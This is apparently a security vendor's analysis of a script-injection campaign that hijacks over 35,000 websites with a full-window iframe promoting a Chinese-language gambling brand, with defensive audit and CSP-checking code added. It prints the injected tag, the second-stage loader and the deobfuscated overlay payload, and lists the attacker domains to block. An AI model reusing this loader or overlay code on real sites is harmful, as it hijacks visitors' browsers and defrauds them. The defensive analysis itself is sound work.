
Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam

Thursday, February 20th, 2025


Himanshu Anand

A new malware campaign has compromised more than 35,000 websites by injecting a <script> tag that pulls code from the domains listed below. Once the script runs, it covers the visitor's entire browser window with an iframe, in most cases showing pages that promote a Chinese-language gambling (casino) platform, and some visitors are then redirected onward to a second domain.

The attack appears to be targeting or originating from regions where Mandarin is common, and the final landing pages present gambling content under the “Kaiyun” brand.

List of Indicators of Compromise (IoCs):

Have you encountered similar redirects, or new IoCs? Please share them or reach out to our team. By pooling data, we can identify and dismantle evolving threats more quickly.

Browsing to the root of each domain in the IoC list returns nothing but a hosting control panel's default placeholder page (original text in Chinese):

Translated:

Congratulations, the site was created successfully!
This is the default index.html. This page is automatically generated by the system.
This page is index.html in the FTP root directory
You can modify, delete or overwrite this page
For FTP related information, please go to "Panel System Backstage > FTP" to view

The Infection Process

As an example, we analyzed zuizhongjs[.]com.

Attackers place a one-line <script> tag referencing zuizhongjs[.]com directly into the site's files (in the <head> or just before the closing </body> tag). Below is an example of the injected code; note the obsolete language="javascript" attribute, which modern templates rarely emit and which is therefore a cheap string to grep for alongside the domain itself:

<script language="javascript"
        src="https://www.zuizhongjs[.]com/js/24/12/7/ky1.js"
        type="text/javascript"></script>

Obfuscated Loader

Inside the loaded file, the attackers use a short loader that inserts another script element to fetch the next stage:

;(function(o, q, f, e, w, j) {
    w = q.createElement(f);
    j = q.getElementsByTagName(f)[0];
    w.async = 1;
    w.src = e;
    j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);

Whatever wrapping the live file carries, the logic is what is shown above: the immediately-invoked function creates a <script> element, marks it async, points its src at a second domain (deski.fastcloudcdn[.]com, not zuizhongjs[.]com) and inserts it before the first existing script on the page. The qbsfsc query parameter carries the current Unix timestamp, which defeats browser and CDN caching so every page view fetches whatever the operator is serving at that moment; the payload can be swapped without touching the compromised site again. Structurally this is the same snippet that tag managers and analytics vendors hand out, so the pattern on its own is not an indicator of compromise. The destination host is.
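As an added example (not c/side's tooling and not the campaign's code), the following Node.js script audits static HTML for the injection described above. It extracts every external <script src> and flags hosts that are neither the page's own origin nor on an owner-maintained allowlist, because, as noted, the loader's shape is shared with legitimate tag snippets and only the destination host separates the two. The victim page URL, the allowlisted CDN host and the sample HTML are constructed for the example; the injected tag in the sample is the one quoted above, kept defanged with [.] as on this page and normalised before parsing.

```javascript
// Added example, not c/side's code or the campaign's: audit static HTML for
// external <script src> hosts that the site owner has not approved.

// IoCs on this page (and the constructed sample below) are written defanged
// with "[.]"; normalise before handing anything to the URL parser.
function refang(s) {
  return s.replace(/\[\.\]/g, ".");
}

// Pull every src attribute off <script ...> tags. A regex is adequate for an
// audit pass over files on disk; a production scanner would use a DOM parser.
function extractScriptSrcs(html) {
  const tagRe = /<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;
  const out = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out.push(m[1] ?? m[2] ?? m[3]);
  }
  return out;
}

// Host of a script URL resolved against the page it was found in, so relative
// ("/app.js") and protocol-relative ("//cdn.example/x.js") sources are handled.
function hostOf(src, pageUrl) {
  return new URL(refang(src), pageUrl).host.toLowerCase();
}

// Report every script load whose host is neither the page's own host nor on
// the allowlist. The loader pattern itself is not checked: it is the same
// snippet legitimate tag managers use, so only the destination host is telling.
function findForeignScripts(html, pageUrl, allowedHosts) {
  const own = new URL(pageUrl).host.toLowerCase();
  const allowed = new Set([own, ...allowedHosts.map((h) => refang(h).toLowerCase())]);
  const foreign = [];
  for (const src of extractScriptSrcs(html)) {
    let host;
    try {
      host = hostOf(src, pageUrl);
    } catch {
      foreign.push({ src, host: null, reason: "unparseable src" });
      continue;
    }
    if (!allowed.has(host)) {
      foreign.push({ src, host, reason: "host not allowlisted" });
    }
  }
  return foreign;
}

// Constructed sample: an ordinary page with the injected tag quoted above
// appended just before </body>. The site and CDN hosts are assumptions.
const SAMPLE_PAGE_URL = "https://shop.example/index.html";
const SAMPLE_ALLOWLIST = ["static.shop-cdn.example"];
const SAMPLE_HTML = `<!doctype html>
<html><head>
<script src="/assets/app.js"></script>
<script async src="https://static.shop-cdn.example/lib.js"></script>
</head><body>
<p>shop content</p>
<script language="javascript" src="https://www.zuizhongjs[.]com/js/24/12/7/ky1.js" type="text/javascript"></script>
</body></html>`;

function auditSample() {
  return findForeignScripts(SAMPLE_HTML, SAMPLE_PAGE_URL, SAMPLE_ALLOWLIST);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const hit of auditSample()) {
    console.log(`${hit.reason}: ${hit.host} <- ${hit.src}`);
  }
}
```

Run against the sample, the site's own /assets/app.js and the allowlisted CDN pass and only the zuizhongjs[.]com tag is reported. Point it at the rendered HTML your server actually sends, not only the files on disk, since a tag appended to a shared footer template surfaces on every page.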

Primary Payload (Deobfuscated)

Below is a simplified version of the primary script, showing key functionality:

// User-agent sniffing: is this a phone or tablet browser?
function isMobile() {
    return navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i) ? true : false;
}

// Landing page that will be loaded into the full-window iframe
var url = "https://www.zuizhongjs[.]com/go/kaiyun1/ky.html";

// Major iOS version parsed from the user-agent string, or false if not an iPhone
function getIosVersion() {
    var str = navigator.userAgent.toLowerCase();
    var ver = str.match(/cpu iphone os (.*?) like mac os/);
    return ver ? parseInt(ver[1].slice(0,2)) : false;
}

// Second, looser iOS check (iPhone/iPad/iPod Safari user agents)
var u = navigator.userAgent;
var isIOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);

// Random integer in [minNum, maxNum]
function randomNum(minNum, maxNum) {
    return parseInt(Math.random() * (maxNum - minNum + 1) + minNum, 10);
}

// 500-1000 ms delay value; in this simplified excerpt it is only computed and logged
const time = randomNum(500, 1000);
console.log(time);

// Lock the viewport and hide scrollbars, then cover the page with an absolutely
// positioned <div> at the maximum 32-bit z-index that holds the landing-page iframe
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden; clear:both;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + url + '" frameborder="0" style="border:0;width: 100%; text-align: center; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');

Key Takeaways

  1. Device Detection
    • isMobile(), getIosVersion() and isIOS fingerprint the visitor's device from the user-agent string. In the excerpt they are defined but never called, so the full payload presumably branches on them to tailor the landing page by device or operating system.
  2. Random Delay
    • randomNum(500, 1000) yields a 500–1000 ms delay. In the simplified excerpt the value is only computed and logged; the full payload presumably applies it (for example via setTimeout) before drawing the overlay, which staggers the visible hijack and defeats scanners that snapshot the page the instant it loads.
  3. Fullscreen Hijack
    • document.write() emits a viewport meta tag, a style that hides overflow on html and body, and a position:absolute <div> at z-index 2147483647 (the largest 32-bit signed integer, so no legitimate element can stack above it) containing an iframe of the landing page. The original content is covered rather than removed. One reproduction caveat: document.write() from an asynchronously loaded external script only takes effect while the page is still being parsed; once parsing has finished, browsers drop the call (Chrome logs a console warning about writing from an asynchronously-loaded script), so the hijack can be intermittent and may not trigger on a small test page that finishes parsing before the payload arrives.
  4. Obfuscated URL
    • The landing url may be further obfuscated in live samples (e.g., via Unicode escapes). At the time of analysis it resolved to https://www.zuizhongjs[.]com/go/kaiyun1/ky.html.
  5. Final Redirection
    • Once fully executed, some users are sent on to a second domain on a non-standard port, for instance https://www.p11vt3[.]vip:6002/register50154?i_code=21708264, carrying an i_code parameter that appears to be a referral or invite code, typical of fraudulent sign-up flows.

Attackers appear to funnel traffic to a Chinese-language gambling (or casino) site operating under the brand “Kaiyun.” 

During our analysis, we identified a few variants on infected websites:

Some IPs or regions see a page stating access is blocked. It instructs users to contact an email or “online support,” possibly to weed out security researchers or reduce unwanted traffic.

Possible Connection to Megalayer Exploit

Our analysis suggests this campaign may be related to the Megalayer exploit, known for distributing Chinese-language malware. Signs include:

  • Localization: Chinese text, references to Mandarin-speaking audiences.
  • Domain Patterns: The structure of zuizhongjs[.]com, plus multiple redirect domains using .vip or other TLDs favored by certain threat actors.
  • Obfuscation Tactics: Unicode-escaped URLs, code-based delays, etc.

How to Protect Your Website

c/side's proxy analyzes the payload of every script request in real-time. Should a script try to load a malicious version, we will spot it, block it from loading, and alert your team.

c/side has already blocked this attack for our users, providing real-time analysis and proactive defense. If you suspect your site is infected, contact your security vendor or hosting provider immediately.

  1. Audit Your Source Code
    • Check your HTML, theme files, and CMS templates for any unauthorized <script> tags referencing zuizhongjs[.]com or similarly suspicious domains. Search the rendered page as well as the files on disk, since a tag appended to a shared footer template appears on every page.
  2. Block Malicious Domains
    • Use firewall rules or DNS-level blocking for:
      • zuizhongjs[.]com
      • deski.fastcloudcdn[.]com (second-stage host used by the loader)
      • p11vt3[.]vip (and associated subdomains)
    • Monitor DNS and proxy logs for requests to these domains. Note that the requests are made by visitors' browsers, not by your web server, so network-level blocking protects users on networks you control; it does not protect the public visiting an infected site and is no substitute for removing the injected tag.
  3. Check for Unauthorized Modifications
    • Regularly review your hosting account or use a file integrity checker.
    • Any unexplained change in core files might indicate a backdoor or injection point. Since the infiltration method is not yet confirmed (see below), rotate FTP, hosting-panel and CMS credentials as part of the cleanup.
  4. Content Security Policy (CSP)
    • Restrict scripts to only trusted domains with a well-defined CSP: an explicit script-src allowlist plus a frame-src that admits no third-party origins would block all three stages of this chain in visitors' browsers.
    • Prevent inline scripts and unknown sources from loading, and avoid the https: scheme source in script-src; it permits every HTTPS origin, including the attacker's.
    • CSP stops the loads in the browser but does not remove the injected tag; add report-uri/report-to so blocked requests become visible.
  5. Frequent Site Scans
    • Re-scan on a schedule and diff the set of third-party script hosts on the rendered page against the previous run; alert on any host that is new and investigate before the first visitor reports a hijacked page.
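To make the CSP recommendation concrete, here is an added example (not c/side's code) that evaluates the URL-matching part of CSP script-src and frame-src, with fallback to default-src, against the three network loads this campaign makes: the injected tag, the loader's second stage and the overlay iframe. It places a policy that looks strict but relies on the https: scheme source beside an explicit allowlist. The victim page URL and the allowlisted CDN host are assumptions; the campaign URLs are the ones quoted on this page, kept defanged and normalised in code, and the qbsfsc timestamp value is made up.

```javascript
// Added example, not c/side's code: evaluate the URL-matching part of a CSP
// script-src / frame-src policy (with default-src fallback) against the loads
// this campaign makes, to show which policies actually stop them.

function refang(s) {
  return s.replace(/\[\.\]/g, "."); // IoCs on this page are defanged with "[.]"
}

// "default-src 'self'; script-src 'self' https:" -> Map(name -> [sources])
function parsePolicy(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Does one source expression match a resource URL requested by the page?
// Handles 'none', 'self', '*', scheme-source ("https:") and host-source with a
// "*." wildcard, optional port and optional path. Nonces, hashes and keywords
// such as 'unsafe-inline' are not URL matchers and never match here.
function sourceMatches(expr, resource, page) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return resource.origin === page.origin;
  if (e === "*") return /^(https?|wss?):$/.test(resource.protocol);
  if (e.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return resource.protocol === e;

  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^\/:*]+)(?::(\d+|\*))?(\/[^?#]*)?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;

  // No scheme in the source: match the page's scheme, or https when the page
  // is http (the spec's secure-upgrade rule).
  const schemeOk = scheme
    ? resource.protocol === scheme + ":"
    : resource.protocol === page.protocol || resource.protocol === "https:";
  if (!schemeOk) return false;

  const hostOk = wildcard
    ? resource.hostname.endsWith("." + host)
    : resource.hostname === host;
  if (!hostOk) return false;

  // URL normalises a default port to "", so a source without a port only
  // matches a resource on its scheme's default port; ":*" matches any port.
  if (port === undefined) {
    if (resource.port !== "") return false;
  } else if (port !== "*") {
    const rPort = resource.port || (resource.protocol === "https:" ? "443" : "80");
    if (rPort !== port) return false;
  }

  if (path) {
    const ok = path.endsWith("/") ? resource.pathname.startsWith(path) : resource.pathname === path;
    if (!ok) return false;
  }
  return true;
}

// Is resourceUrl permitted under `directive`? Falls back to default-src; with
// neither present, CSP imposes no restriction on that fetch type.
function isAllowed(policy, directive, resourceUrl, pageUrl) {
  const directives = parsePolicy(policy);
  const sources = directives.get(directive) ?? directives.get("default-src");
  if (!sources) return true;
  const resource = new URL(refang(resourceUrl));
  const page = new URL(pageUrl);
  return sources.some((s) => sourceMatches(s, resource, page));
}

// The three loads described on this page, as defanged there. The qbsfsc
// timestamp is a made-up value; the real loader uses the current time.
const CAMPAIGN_LOADS = [
  ["script-src", "https://www.zuizhongjs[.]com/js/24/12/7/ky1.js"],
  ["script-src", "https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=1740000000"],
  ["frame-src", "https://www.zuizhongjs[.]com/go/kaiyun1/ky.html"],
];
const PAGE_URL = "https://shop.example/"; // assumed victim site

// Looks restrictive, is not: the https: scheme source admits every HTTPS origin.
const WEAK_POLICY = "default-src 'self'; script-src 'self' https:; frame-src https:";
// Explicit allowlist: own origin plus one assumed CDN; no third-party frames.
const STRICT_POLICY =
  "default-src 'self'; script-src 'self' https://static.shop-cdn.example; frame-src 'self'";

// Number of the campaign's loads a policy lets through.
function countPermitted(policy) {
  return CAMPAIGN_LOADS.filter(([d, u]) => isAllowed(policy, d, u, PAGE_URL)).length;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("weak policy permits", countPermitted(WEAK_POLICY), "of 3 loads");
  console.log("strict policy permits", countPermitted(STRICT_POLICY), "of 3 loads");
}
```

Under the weak policy all three loads are permitted, because https: matches any HTTPS origin; under the explicit allowlist none are. A source without a port also rejects the p11vt3[.]vip:6002 redirect target, since the non-default port has to be named to match. Adding 'strict-dynamic' would not reopen the hole: it only propagates trust from scripts that already carry a valid nonce or hash, which an injected tag does not. The policy stops the loads in visitors' browsers; the injected tag itself still has to be removed from the site files.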

The ZuizhongJS malware campaign demonstrates how a single injected script can hijack thousands of websites, redirecting unsuspecting users to Chinese-language gambling portals. The presence of well-known soccer logos and sports references suggests a bid for legitimacy, but the entire operation appears unlicensed or outright fraudulent.

  • Website Owners: Remove any injected scripts, block malicious domains, and strengthen your security configuration to prevent re-infection.
  • Security Researchers: Further exploration is needed to confirm the link to Megalayer, pinpoint the exact infiltration methods (e.g., vulnerable CMS plugins, stolen credentials), and track additional domains.

c/side has successfully detected and blocked this attack. If you're concerned about potential infections, our system can provide real-time analysis and proactive defense.



More About Himanshu Anand

I'm a software engineer and security analyst at c/side.